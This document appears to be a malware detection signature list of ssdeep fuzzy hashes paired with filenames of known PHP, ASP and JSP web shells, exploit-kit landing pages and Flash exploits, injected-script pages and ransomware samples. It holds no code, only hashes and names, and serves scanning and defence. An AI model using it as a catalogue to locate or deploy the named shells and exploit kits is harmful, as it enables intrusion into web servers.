+768:UjzHpFjv8H31C7jODLMCpP/HLDLtoLKLALCzV8UML0K6qVnR+N7Krp88+QU6nEJV:ezHvk9Xo4eXD68+QUi4e0IL7p4,"reduh.aspx"
+768:UHepbWDrdVm3GFS/QGSJyhmwoIVoHCEVJx6bo+1vse9qUIRDMpA9:UHepbWDr+3Go/Bm9IaH/nx9aq3ep2,"devilzShell.jsp"
+768:uH7uaCsPCO5B07lCEGHyddwjlzDXd2XSHs/EJKB5KKZMu4zIbEZReaVRvMSTlb4r:uH7//KB5KKZitR7l8o7q,"pps-v3.0.pl"
+768:+U81pywZRAb9m1I2ED0CHmP7K06w7Sh5tUiv3wq5+b7pOCZ/POYTIC:YDzLPWKSh5tUifub7ZZnOYTt,"jshell-ver0.1.jsp"
+768:U6PU1ZwvmUnNhEhL6MW4nojM88PdqMZTISor5:U6E6EhL6xkojl8PdqMZT5Y5,"Backdoor.ASP.Ace.f-海阳顶端网ASP木马红粉佳人版.asp"
+768:++TZmXT61uHxg/Df4gBukyyFQFeQX+4jNRrvPLqmJAnZ9fNTS+Vclv:++UXu1uHxc74g+cced4D1QHfNTvSv,"Backdoor.ASP.Ace.ao.asp"
+768:TuKilAd7O5sU15KExqSh+o+vumXcVkW/oeZh:TuFl5vPxqSh+o2XcVV/oeZh,"2016-02-26-page-from-hscteam.com-with-injected-script.txt"
+768:TRGcaC18zCw1xmL6pCc2HKCveQpO6CuM6RkR5Evqu0FSedz27YsSvDlU:TRHao8lmWCvM6XzWGnc2kU,"cpu.php"
+768:TReE1uGqsPCO5B07lCEGtN3dMjlzDXd2XSHs/0JKB5KKZzyCzIbEaJ4nM+RrLwO7:TReE1q5KB5KKZz5BrLu7g,"pps-v3.5.pl"
+768:tOVBbFjzX42R7fb7S5gWP6HxPyuDLzvFn6eoINf0u4Y0HbGo0Hb:tOpzVRfegzxPyuB6eB8nbGZHb,"3.png"
+768:Tiz0n8zVW8MQSSvFvXUnV/WoJATar0oiRlPSJZ9Pd0Q:+zpVWdOvqWouvoex8Z9Pd0Q,"686db284a7b917f6b847ac9a0de04f6f.asp"
+768:tFrnqSV13CqMaPLy2N3eWsR6Gnq3/fZP2x+fUHI5nelhf0BAPPKvIl2Mwiig40k:t5VFCqMaPLy2N3eWsR66ZIM3k,"ex0shell.php"
+768:tFMnqSV13CqMaPLy2N3eWsR6Gnq3/fZP2x+fUHI5nelhf0BAPPKvIl2Mwiig40J:tOVFCqMaPLy2N3eWsR66ZIM3J,"ex0shell_by_KingDefacer.v2.1S.php.txt"
+768:tDhnqEO3zE/qMapLy2N3eWOhCNnqW/fZP2x+fUhy5nelhf0BAPPKvIf2RW/igk7:tY3zIqMapLy2N3eWOhCinORL,"megabor.php"
+768:tDEnqEO3zE/qMapLy2N3eWOhCNnqW/fZP2x+fUhy5nelhf0BAPPKvIf2RW/igkC:tX3zIqMapLy2N3eWOhCinORy,"Megabor_by_KingDefacer.php.txt"
+768:tCLAcEYI0dnXIPVG60y7+dqwbsLuBB0HaQipvxnfgrPME1liGfl+8L6/HYRqL6:M4PwGwbx0Am1ldo8UL6,"3.jsp"
+768:tCLAcEYI0dnXIPVG60y7+dqwbsLuBB0HaQipvxnfgrPDEiciGfl+8L6/HYRqL8:M4PwGwbx0AHicdo8UL8,"jsp-File-browser-1.2.jsp"
+768:tCLAcEYI0dnXIPVG6007+dswbsLuBB0HaQipvxnfgrPDEiciGfl+8L6DTFaqL8:M4PwOwbx0AHicdo8aL8,"ma.jsp"
+768:/Tb0gRy2WLmHzeeAx4R+e2yPwPFmM+eEehQjI0IOQ6eFApnHv+Du:rj5xAx48KNMclI9kpP+Du,"2016-04-04-Angler-EK-flash-exploit-after-womenshowesweb.net.swf"
+768:t/643hkCH1f+rqPbfjZoYgXl+7TWeITT0NRVT1UT8kVXICS66MjsKi2PiTmHn/XI:+eNehQece,"2016-07-15-pseudoDarkleech-CryptXXX-decrypt-instructions.BMP"
+768:T5sHP2NbKzidlVY59kbKzidlVY59kbKzidlAmVLybKzidlVY59+lSd05hLYVPIqn:T5sHPiKr5UKr5UKu6Kr5U4dpDGV48E,"Chrome Font v8.17.exe"
+768:t3Xt+3/9lQdG6ySrYcmtahAJ68fkC0e5FYn3D6jZcIC2xqYtjcpkfUD+gbI5WQXo:h9moIir7c68f3LYnT6jZp/IpY2IAqYh,"bbb3.php"
+768:t0bU4SbqX+4jl7EBNRjal0OC5eVdVIhyTuIqYDvNTbervZWhVZ21wNX2u89VACrm:ObRSbqOMl7WtaK5ejVeI9zNvoWJD8990,"c99madshell-v2.0-madnet-edition-obf.php"
+768:SzFqeN7T2/63PofVmwbTr4FUXU04vayUQE:SAa3PgVhj4FUXU0ovE,"2016-06-01-page-from-northpoleitalia.it-with-injected-pseudoDarkleech-script.txt"
+768:sYrMpVvLZYquFjVfrhFjhYB03zSnIdju4BTDEKw3PX+mig9mUxOSd:sdpVvL6qMjVffVf3zSn5JdmUxOSd,"beyaz_hacker.txt.001"
+768:SY+Q7qwwHrSVLKvZYLN3QVLsUbegf80MsLVRqRF1nQ1Vvv9NMEu16nGa08S9dS:SYL7BwLSVOxYLbUbegf7LVsNnQvYmU,"Attached AE9C44229A7CCB4.msg"
+768:SwpPRzPN6nifiuJZPhTePUjzhEpQ5Un/WPXPQq8Zk:SwTF6ifiEvedS5Un/WPXPQq8Zk,"Backdoor.ASP.Ace.i.asp"
+768:SUzdjjN2Ef56gNAiUBqSTlNclDcwuANH+e//E/GN:9hNJqclDXBN,"Backdoor.ASP.Small.f-网页管理.asp"
+768:sUY0itkHJkp4+67YymfzkEOQEl+1+9qHvg158lbBDnOgdB:sUYrN27K7WrR9AY15QTjB,"1.php"
+768:sUL4c8OxwyQRxMK5KDbeoq9w21CxXabJxC0t3jJKaeb0JYxhPFlBelQjom86imsJ:r1YyQDiK9wCoaagEzbFb4ijnizpiI,"2016-08-16-pseudoDarkleech-Rig-EK-flash-exploit-after-blenheim-lodge.com.swf"
+768:sr8PJDRx3hPsz5zwwZniLt4NfOqb/beNAUHnrMQ:sr8PJDRxt0ZWtGfOqGNAUHrt,"2016-04-13-page-from-medical-library.net-with-injected-script-second-run.txt"
+768:So9xeikFLUu0larUnz1R3xP+5+QOsMeDVmB3HzholueTm9:buiSUu0lar4z1R05+QBPWeK,"phpspy_2006.php"
+768:Sn9xeikFLUu0larUnz1R3xP+5+QOsMeDVmB3HzholueTm9:cuiSUu0lar4z1R05+QBPWeK,"PhpSpy Ver 2006.php"
+768:skGdeMDcgVKNlNO4sqcsOzaimWOxwfX86vVgMymPFdoUy7Rt1K:2DcNgbEphByfX86vN9xyTI,"b374k-2.5.php"
+768:SJ/vy2Rl3Aequ9pvlok4H/w/L/Zw//aprqda:SJ/vykl3VviHIDecqda,"Invoke-Portscan.ps1"
+768:SICHcrESZdhjqnSo09mTgzP4B46e732KiIffvrPRp:zQev9mTWP4BLeKKvRp,"crypto.php"
+768:sHA6xuC98booxBXUwXqToa6Zcz13DjMqYW/RwxaRX:2wqolceqYW/Rwxk,"Backdoor.ASP.Ace.cn-By9xiao.TEL.专用Shell.asp"
+768:SFQrU028iNoCB5XhSs94hcEyTMZDMaZbrOjaG7KtXN6aHF:SFR0JiCCB5XhSs94hcRTMZDvUjaG7KtZ,"2016-06-21-page-from-ladepresion.org-with-injected-EITest-script.txt"
+768:SfQ7cwsEaP07p3lmT28GS6FTPVwN7zlAeeej2P:qQYcz38GSYxKZleSU,"ACat-src.zip"
+768:sEyFCgB02Xt+no6KoCxd29FDROFsaiWJ9PPR/FospP5Jn:jFr2Xt+ngw9WFsCJz35Jn,"tool.asp"
+768:SeGgqyqVWoskWuc2E89oD3RX+I4TBV/7gSl1:SVgHq1oD3RXsVMSl1,"2016-07-08-page-from-toronto-annex.com-with-injected-script.txt"
+768:SdEiJp2+zP8qFdZpKtP5/vnwC7TdiNmKGpYqHmPYif6PEs7pjM:/ChDFdZpKh5vnwCvdiNmKwFUUEsdM,"Backdoor.ASP.Ace.cp-新杀客助手ASP站长文件管理助手.asp"
+768:S+AKW9NXdMvCWZsXi4ASpb9DePuVaKnGZGyU6W6d6zbWZB:SfNQKq8T2Gy08B,"2016-07-13-page-from-scarboroughcricket.ca-with-injected-script.txt"
+768:SaGMhMndXPywExsJVaer6tWz2OBWDKbtr6O/MlOUPxeY9N5x8GChv7nD:ZGMhMndXPywExkrV4oD,"dabao.asp"
+768:S5wG1CtVNM+XLjCeTTN9pRqlPYZ0D0NnJL3e81ZFL+L2gX:y1gu+XLjCMolTD0hJLe2gX,"toolaspshell.php"
+768:S5wG1CtVNM+XLjCeTTN9pRqlPYZ0D0NnJL3e81ZFL+L2gG:y1gu+XLjCMolTD0hJLe2gG,"RHTools_by_KingDefacer.v1.5B.asp.txt"
+768:S5wG1CnpE4+XLjCeTTN9pRqlPYZ0D0NnJL3e81ZFL+L2gX:y1gB+XLjCMolTD0hJLe2gX,"RHTools_by_RHESUS_FACTOR.v1.5B.asp.txt"
+768:S5wG1CnpE4+XLjCeTTN9pRqlPYZ0D0NnJL3e81ZFL+L2gP:y1gB+XLjCMolTD0hJLe2gP,"tool.txt?"
+768:S1yX9IR4C4+XLSVNs7/u1AXLfejfApBjLW:i5XG87u6XLfwopBjLW,"diam.txt.11"
+768:S1yX9IR4C4+XLSVNs7/u1AXLfejfApBjLc:i5XG87u6XLfwopBjLc,"diam.txt.10"
+768:S1yX9IR4C4+XLSVNs7/u1AXLfejfApBjL9TrINejiKR:i5XG87u6XLfwopBjL9ANQL,"diam.txt.13"
+768:S1+bpK5cZwZBv8nxdLxCmaBaBfc5YylKbaXJ:S1+wcZwZBOTx+4BUWylKbaXJ,"2016-06-01-page-from-medicalandspa.com-with-injected-pseudoDarkleech-script.txt"
+768:s0OGqCDMLDza8gYM8pzFerEhVcNSCgmHHa2X:J2LDzHhM8pzFer1d962X,"jsp.txt"
+768:rxKHNSFKYCJOeRU80Z7q0FSBLIWPMWsT8VDJ6bO/qh:rxKHNSFKYCJbeQ0yLIWPM9bmqh,"IncludeW-Shell.php"
+768:rLLioirFPnIx+rcAbARmOrxpLZ6oBo38Wu8GF21x+Kn:rLLiN5aEHbAXxpLZ6lxu8GY2Kn,"ob49.txt"
+768:RhSFZLmVOp6deR+1Te/UqabzkDNiwdfiLcK:LS+sp6dgOTnboDNiwdqoK,"long_hm.php"
+768:ReFMz86AAnJcxyDzkqN9C2GUiEBLlO0PzcStczfQ:ReKIAn3DznN9C2GbErUzfQ,"WSO.php"
+768:re3bK13KRWYWHPw1NXzalhQ+yUQbu0GRe3N:K3+16RWxP8lza7Q+M,"VirusShare_3488c0971e50fce833d332de55616eb5"
+768:rAmFgm8axX6wOzzN8yaCA4nunvGPnE6gy0REfPyY:rA2YQ4unvGPnE6gy0CiY,"tr.phtml"
+768:R2miy0DhCipI+Na+27PN7Y22IDDndJfvCNEQUEl61Lvpgmwhs07XR5LM:Rxk71N92bdY22IDDnXfvCNEpENsA5LM,"spread.txt"
+768:QznFJCripoR848O5Dgidqoi5sy4d4K+0/8jDHHfPwZK8/FDc/iHzri:Quri/zOrde7YxcKni,"itsecteam_shell.php"
+768:Qzn9sipoR848O5Dgidqoi5sy4d4K+0/8jDHHfPwZK8/FDc/iHzrM:Qai/zOrde7YxcKnM,"jHn.php"
+768:QwiaMUQlxtW3VmB3HzhoxpeTbYnbNZR55t94d:hiaMjVGVeP+c,"erne2.txt"
+768:qvp3b4QLKSkwdE6Gr6k/g3ztNa+jlP51bI:Ipr4QLGwd0Q5NaOlP5NI,"soldierofallah.php"
+768:qvp3b4QLKSkwdE6Gr6k/g3ztNa+jlP51b1:Ipr4QLGwd0Q5NaOlP5N1,"soldierofallah_by_SoldiersofAllah.v1.0.php.txt"
+768:qRrxOjl2CRuZlLs9BFGCZjwer8WxisEFu2KB45flqcSf:hYCuTonGCZjdrxisEFuz2BVm,"VirusShare_7d102facc473c95a711f107a7876b9a4"
+768:qP3Xo00SWcY0JPpqK8y2Bv8Kr6RPzjlcVrUtqMyLJVGk8gwloUOVARY:qvXo00SWcrpqW2Bv8JRPzjlcVrUtqMyr,"jspshall.jsp.txt"
+768:QgOhImmjzyjWLQ4RBwLtcySYeXK+Umfg890uwErCyIgVMef/yoKboMyUvZy4AMHp:8+jz7QUB0tcy5eVBfgk0xExKqWbUUvZP,"b374k-2.4.min.php"
+768:qfPnl6REZCvSEa1fBodEs3m5ZVu7/7dXztH:MN1fBguYzfH,"wso2_pack.php"
+768:qExubnQjuQfKJM3MCVvhn25b7eG8rKlwXaSBb0eqvBJ:KbQjuQfKJM3MCVvhn25b7eGZs0eqv3,"icesword.jsp"
+768:QB/frilM/wpIqidr0zdhDUg2sLpGAbQooHyiIlllllllllrU:Q5iM9Bdr+d6bA1TlllllllllrU,"gfs_sh.jpg"
+768:Q96g/hix3+L+K1u2qiULi+pV+xpOio4wggAb/:Q96gZq4O/up7,"erne.txt"
+768:q7ZY27tyt8vl+/Amb2SeyC78dEjbXOgKXtMdBdTYG9WHjQM+QCHQa+:q7ZZtIWTy3KjblKoP9c+QCHu,"2016-02-23-Rig-EK-landing-page-after-pavtube.com.txt"
+768:q7xWLtyt8vl+/Amb2SeyC78dEjbXOgKXtMdBd5aDKMQgP5:q7etIWTy3KjblKW85,"2016-02-23-Rig-EK-landing-page-after-theprojectgirl.com.txt"
+768:q7vY27tyt8vl+/Amb2SeyC78dEjbXOgKXtMdBdnvY/:q7vZtIWTy3KjblKQG,"2016-02-23-Rig-EK-landing-page-after-planetside.co.uk.txt"
+768:q7dq27tyt8vl+/Amb2SeyC78dEjbXOgKXtMdBdsYG9WHjQM+QCHkx:q7dbtIWTy3KjblKDP9c+QCHC,"2016-02-23-Rig-EK-landing-page-after-cyclocamping.com.txt"
+768:q70tyt8vl+/Amb2SeyC78dEjbXOgKXtMdBd7IY9WHjQM+QCHgaa:q70tIWTy3KjblKK9c+QCHi,"2016-02-23-Rig-EK-landing-page-after-ancientbathsny.com.txt"
+768:pVvLZYquFjVfjhqjhYFGO4DSnIdX/FBTmEKFIZX+N+9mZxOSW:pVvL6qMjVfYVtO4DSnKJmZxOSW,"new-shell.php"
+768:pVg1dlh23yWEYCqEreJlLFjq/O4fm7nUYlUJcrQ:pVg11MWqErylLFjIO4fgLnc,"Hackersh-0.2.0.tar.gz"
+768:PV3X8dYs9YFqtgXItbtUGwlD3oJ/HgGFR8f+CiPTdVXkF1SjdcK/Xco6sA0B6PtU:BXkY6yquId3wFmLR8fwTdVXkFsRd/Xl1,"5ad994747dcb67a113a702116612f4f3_php.txt.orig"
+768:pTRFNcVSiQ9PXlPbD6/rnNdaNQoSoYEFgaz1Gp:N9vlPbD6/zCSoHFg1p,"binaryreader.dll"
+768:prUuxg019Dhlt7SA6EhFl86f41l9PeTgQVPn99V7dbJ:prpgyt7/6kD86f45eTg89J1,"2.png"
+768:PQ1rMZGrykjSug0H52KfE7OWxae2X5RbTJF:soG7+u35/IOWc3Pn,"c67396bb4f086d0d1de8d94da8b76266_php.txt.orig.001"
+768:ppTO/dpB0GlmqL0cilpZV+HzQTWPITg8ki7nNhYbUUfPkDEDrXnQHx1R:ppTsqGlmq4RbZQTQZg8L7zEU8PnKR,"2016-03-29-EITest-and-other-Angler-EK-artifact-retrieved-after-Bedep-infection-1-of-2.exe"
+768:PpJTqgcXfHVHm4aQ4HezM+d0wYvsGCt2HMdGNvOT/MNIJD:O3X/VIBHcM+d0wYkxEMd5,"2017-03-06-Spora-Ransomware-5th-run-Chrome_font.exe"
+768:poyDQrcbylu/K7snS6knZ/rfmw8rj1DGW3c1hIUiTr3uN:poyDQrcbH/KwnC/erNGW3eliTr3e,"devilzShell.php"
+768:poyDQrcbylu/K7snS6knZ/rfmw8rj1DGW3c1hIUiTr3u9:poyDQrcbH/KwnC/erNGW3eliTr3c,"devilzShell.php"
+768:PoW3C1sofA01AqQvoFkDeGClpa1lb6ipNePZIASfEhgjcMJoivmt98v520q7aiw0:D5zeP+AS6MJrvmT6q+Euzq,"dy.jsp"
+768:PmJ3R0Fhbudij1bAixTO3sSTY07ikWHQRXHguRRWH13utvmfJXNFmiAQdu14TZ:+JubyUJ7hO862iwuRRPgcmZ,"3.php"
+768:pmBlKtRvn+PA/ZRI70AMXpFnM6KDNgvWhYM1X:pmBlKjPQP0jXpFnM6ynY+X,"devshell.php"
+768:pK69Qeanu1yOjI5N4OGIqeVXUUUGLbNcju9dPicssG0:zvAtNZ1ssG0,"linuxprivchecker.py"
+768:pGdCRp2Y5jxlg5+5/f4HyKML/3g9p00ZRBmi1tC7KgWbeh1D4xQpt:pGdCLX5jxlh34HyTLI9p0KB1tJ8H,"Crack8_PHP.txt"
+768:PfUDvextAGAgG5MUy5Qq8fwK8ogVN75fPw367x0FiFTsxiq8L2x:nSz7x5sbYtFYs83ax,"bee83beb0375ed9d270e051519c808f7_php.txt"
+768:Pfk4HvKWk0kzq0J67VCe9GY/TCPyQrEvL6ZxleXJYTen+UUs:3k4HvKWk0kzq0J6JCIGY/TlQ4mZaJYTO,"conf_4cn.php.suspected"
+768:pBm8+I34ayZ64M71q8zK9dnYvMm/AUZ/fI:PmZI3qZ64M71pqdnYvMiAUZXI,"Antichat_by_Grinay.php.txt"
+768:/pBadDHHdOO0wkLh42OMm++xG2dswgCRpsOIczGo4d8:/p6xDIbxd8,"2017-02-26-page-from-biversum.com-with-injected-pseudoDarkleech-script.txt"
+768:pACiSDCXsEYDclxC5ukodbZly+hKc05wFhg:pAzSD9L1odb/8ohg,"image.341"
+768:pACiSDCXsEYDclxC5IkodbZly+hxc05wFhg:pAzSD9L3odb/7ohg,"image.340"
+768:pACiSDCXsEYDclxC5IkodbZly+hhK05wFhg:pAzSD9L3odb/rahg,"image.342"
+768:pACiSDCXsEYDclxC58kodbZly+hdc05wFhg:pAzSD9L7odb/vohg,"image.339"
+768:p6ylKtRvn+PA/ZRI70AMXpFnM6KDNgvWhYM1X:p6ylKjPQP0jXpFnM6ynY+X,"koplak_php%3Bme.txt"
+768:P5YLUxbmEaiQiIwtTGrz6lnglmwF1h4AfqS0qNs12GtVveHr:BY4UkQsGWlgcYj5qSHS1JtVveL,"obf2.php"
+768:p0bU4SbqX+4jl7EBNRjal0OC5eVdVIhyTuIqYDvNTbervZWhVZ21wNX2u89VACrn:CbRSbqOMl7WtaK5ejVeI9zNvoWJD899R,"C99-3.txt"
+768:OZrJ+A70YIKPxIDy1kWDj4y2CcEMCrnhkmI7+CiW:OKa0YvPxIDy1hHMCrh3I7+bW,"a_gedit.php.php.txt"
+768:oZ/J/X2QdyxmipEU4ar9q3sgZ1z3L7lWryJ0sVs/n:oZ/JHar94N1z3VWk06s/n,"Backdoor.ASP.Ace.br.asp"
+768:oWQuM9l8kxjGNCUALWaKB6HAqMTx+sQaSIWXm:euM8BUs/,"tryag2.txt"
+768:oVl9SAdGtgh/k/8tZbHzdCL4VAHHOVGKvUwJUMBL34DXOkxSIi6Kr9ddtmLhFU7I:VIGqRvRk0PSnwdtm9FU7I,"6d0b0983a16eb0ef3412da6b399268cb_php.txt"
+768:OmwP/bF4gLTzqcW7KA7XA73L77++vDCubz1zSek2zTyobz1ROb23p5VkDRT4um6x:GvzqcW7KA7XA73L77++vD/bz1zA2/bz2,"2016-06-20-Sundown-EK-landing-page-2-of-2-second-run-with-IE8.txt"
+768:oMotbY+71366Csw352V9vPv6hEnJ2XQEmdr8jdspUk3EFYFj0/DCgoV086HMtt/d:Notb/713vw3c9vfnJ8QEmdrQJMj0/DCp,"bad.php.6"
+768:oMotbY+71366Csw352V9vPv6hEnJ2XQEmdr8jdspUk3EFYFj0/DCgoV086HMtt/0:Notb/713vw3c9vfnJ8QEmdrQJMj0/DCY,"bad.php.41"
+768:oMoE4KBNM5A05jJueVLZAL02L211yco4tZ8lE3OEsQHCk1x1XZdyj08d5Y:NoHKEdj0eVFn2CTYGZ8EOETi+PK5Y,"bad.php.002.001"
+768:+olLHEo8iKEdq/jX3ax2AtqD9FLSL0jWkdIlkEfU93CFhJuIU4iMENRb9:l8Ic/jqx2rD9FLtW893ehrU/J,"27888.8942.php"
+768:oKU/bkVPbu+xpj/fuOng1ktXZjCC4/K3MPqI7UOi:RU/wVPK+xpje1kRZjCCt3MPqI7U,"cw.txt"
+768:oKU/bkVPbu+xpj/fuOng1ktXZjCC4/K3MPqI7UOb:RU/wVPK+xpje1kRZjCCt3MPqI7F,"cw.php"
+768:OkHq1h7NnEHgvsq6aeVACobSLy+WxpVxr3v:OkHqbhEKH6BVN/Ly+WxpVB,"GFS_Shll_Priv8_by_GFS.v3.1.7.php.txt"
+768:oHNPNGufMK/798Q7Zg1zgJWsfhJ3cEKH0RULCK:8NGuheQ7Zg18WsZ8H0k,"MFSv8kP07U20"
+768:ogVtmQ6vCwpBR9gSLQMcImtKnJm0b+P3Ek:o2FaCwpBR9/cvI4Kne8k,"连接密码.jpg"
+768:of8nc6C9rxJrMW/wvBWProl3UUUk/7vY3O:of8nc6ZW/wsro1U2/rY+,"26e9142061b1abda5f851546c43c65fd_php.txt"
+768:Of3fflSISE0LHgX/8WSESCSaqAmb1UrQL9wsTwsYetLGtF:ISISl8XSESCSaq3W8L9wsTwsYqLGtF,"Safe-0ver-byPass-Shell.php"
+768:oddL6+v5ropVF7CdQFvT49MwwRz4PPSKKmPg4S9lbKG81mSy3TRhqoihyZy:odtf3QFvOMwwRkNWKGQV+Tqoi4U,"SnIpEr_SA_Shell.php"
+768:oddL6+v5ropVF7CdQFvT49MwwRz4PPSKKmPg4S9lbKG81mSy3TRhqoihyZ/:odtf3QFvOMwwRkNWKGQV+Tqoi4R,"SnIpEr_SA_Shell.txt"
+768:O6Dyh7L7a1rqEyE6v77Ut4QrFjtOEim5f5efpzEcYrwPbXlh98nnzl:JLBLimRwVPlq,"Backdoor.ASP.Ace.fz-站长助手-修改版本.asp"
+768:o3zKzFX29UgfqumPYiM+q/yq7w9x5U8F52Wq+s8d:+IXkfqsx7yNx2WIS,"Backdoor.ASP.Ace.aj-ASP站长助手5.0.asp"
+768:O0bU4SbqX+4jl7EBNRjal0OC5eVdVIhyTuIqYDvNTbervZWhVZ21wNX2u89VACrn:FbRSbqOMl7WtaK5ejVeI9zNvoWJD899R,"c99madshell.php"
+768:NrTZvQbtiCbDy0r3LnT0/vZ9IA4yCPa7Jo:HQcCbDW/XIU4a7m,"clones.txt"
+768:/NOjduPwz8mgpV+zyfUzefZ17jckxpRjhP8b0m1tcqz:/0cYYmgpV+zy4CZ17j/HRdlE/,"wp-error.php"
+768:nNOjduPwz8mgpV+zyfUzefZ17jckxpRjhP8b0m1tcqD:n0cYYmgpV+zy4CZ17j/HRdlEn,"791287982713.php"
+768:NEB/uGqsPCO5B07lCEGtbWdMXzzDXd2XSHs/02KB5KKZrYMkyfcGdWEawcnM+EJd:NEB/PGKB5KKZkMpkUJkLC7N,"pps-v4.0.pl"
+768:Nc7HnM0/ZMJau4u2tmXjtss2W4QmttXSy:Nc7HnvxMJR4u2kaW4QmttXSy,"20140901-03.jpg"
+768:n9Bg/hix3+L+K1u2qiULi+pV+XpOio4wggA5Y:n9BgZq4O/2py,"ErNe-Safe-Mode-byPass.php"
+768:n1lc3UjiNjGmYjKlaCS/uiy055/3ZWjAo5bayZFRL8fx21P79:12oQGRWlayd0520o5bpZFRxP79,"b374k.php.php"
+768:N0OGqCDMLDza8gYM8pzFerEhVcNSCgmHHq2P:K2LDzHhM8pzFer1d9K2P,"JspSpy.jsp"
+768:N0bU4SbqX+4jl7EBNRjal0OC5eVdVIhyTuIqYDvNTbervZWhVZ21wNX2u89VACrm:ubRSbqOMl7WtaK5ejVeI9zNvoWJD8990,"c99madshell_v2.0.php.php.txt"
+768:n0bU4SbqX+4jl7EBNRjal0OC5eVdVIhyTuIqYDvNTbervZWhVZ21wNX2u89VACrm:0bRSbqOMl7WtaK5ejVeI9zNvoWJD8990,"mod_system.php"
+768:MYyDqz83F9u25ad4+08GruikJr3sr9ZNkuLRldW:n83F9Sd4puiIr3sr9ZSuLRldW,"jsp-File-browser-1.0.jsp"
+768:MRfsECckwRWSn2Xrtm5x8PDfLENvb2EWQViXI2NI2CvXfi:2PWSn2XM8DfL2z2cViXI2q2CvXfi,"images.70"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWzkbiXI2NI2CvXfi:2PWSn2XR2DfL2z23QiXI2q2CvXfi,"image.14"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWxBiXI2NI2CvXfi:2PWSn2XR2DfL2z2dBiXI2q2CvXfi,"image.3"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWW0iXI2NI2CvXfi:2PWSn2XR2DfL2z2a0iXI2q2CvXfi,"image.6"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWUzikI2NI2CvXfi:2PWSn2XR2DfL2z2MikI2q2CvXfi,"image.29"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWtZikI2NI2CvXfi:2PWSn2XR2DfL2z2JZikI2q2CvXfi,"image.23"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWTPtikI2NI2CvXfi:2PWSn2XR2DfL2z2/tikI2q2CvXfi,"image.26"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWQDiXI2NI2CvXfi:2PWSn2XR2DfL2z2cDiXI2q2CvXfi,"image.15"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWpNiXI2NI2CvXfi:2PWSn2XR2DfL2z2lNiXI2q2CvXfi,"image.7"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWPJriXI2NI2CvXfi:2PWSn2XR2DfL2z2DJriXI2q2CvXfi,"image.20"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWpikI2NI2CvXfi:2PWSn2XR2DfL2z2likI2q2CvXfi,"image.28"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWONiXI2NI2CvXfi:2PWSn2XR2DfL2z26NiXI2q2CvXfi,"image.19"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWNiXI2NI2CvXfi:2PWSn2XR2DfL2z2BiXI2q2CvXfi,"image.16"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWLkRiXI2NI2CvXfi:2PWSn2XR2DfL2z2nkRiXI2q2CvXfi,"image.5"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWKRiXI2NI2CvXfi:2PWSn2XR2DfL2z2GRiXI2q2CvXfi,"image.4"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWjRikI2NI2CvXfi:2PWSn2XR2DfL2z2PRikI2q2CvXfi,"image.24"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWjiXI2NI2CvXfi:2PWSn2XR2DfL2z2/iXI2q2CvXfi,"image.9"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EW+ikI2NI2CvXfi:2PWSn2XR2DfL2z2CikI2q2CvXfi,"image.25"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWIiXI2NI2CvXfi:2PWSn2XR2DfL2z28iXI2q2CvXfi,"image.8"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWGiXI2NI2CvXfi:2PWSn2XR2DfL2z2KiXI2q2CvXfi,"image.12"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWfQikI2NI2CvXfi:2PWSn2XR2DfL2z2MikI2q2CvXfi,"image.27"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWF6iXI2NI2CvXfi:2PWSn2XR2DfL2z2R6iXI2q2CvXfi,"image.21"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWdJiXI2NI2CvXfi:2PWSn2XR2DfL2z2hJiXI2q2CvXfi,"image.2"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWBPuiXI2NI2CvXfi:2PWSn2XR2DfL2z21PuiXI2q2CvXfi,"image"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWBPiXI2NI2CvXfi:2PWSn2XR2DfL2z2tPiXI2q2CvXfi,"image.17"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWBM1iXI2NI2CvXfi:2PWSn2XR2DfL2z2NM1iXI2q2CvXfi,"image.22"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EWaAiXI2NI2CvXfi:2PWSn2XR2DfL2z2BiXI2q2CvXfi,"image.11"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EW7iXI2NI2CvXfi:2PWSn2XR2DfL2z23iXI2q2CvXfi,"image.13"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EW75iXI2NI2CvXfi:2PWSn2XR2DfL2z2H5iXI2q2CvXfi,"image.1"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EW5iXI2NI2CvXfi:2PWSn2XR2DfL2z2liXI2q2CvXfi,"image.10"
+768:MRfsECckwRWSn2Xrtm5OqPDfLENvb2EW1GSViXI2NI2CvXfi:2PWSn2XR2DfL2z2sSViXI2q2CvXfi,"image.18"
+768:MRfsECckwRWSn2Xrtm5O8PDfLENvb2EWxQiXI2NI2CvXfi:2PWSn2XR8DfL2z2dQiXI2q2CvXfi,"images.90"
+768:MRfsECckwRWSn2Xrtm5O8PDfLENvb2EWWxiXI2NI2CvXfi:2PWSn2XR8DfL2z2yxiXI2q2CvXfi,"images.82"
+768:MRfsECckwRWSn2Xrtm5O8PDfLENvb2EWwUiXI2NI2CvXfi:2PWSn2XR8DfL2z2kUiXI2q2CvXfi,"images.72"
+768:MRfsECckwRWSn2Xrtm5O8PDfLENvb2EWTiXI2NI2CvXfi:2PWSn2XR8DfL2z2fiXI2q2CvXfi,"images.81"
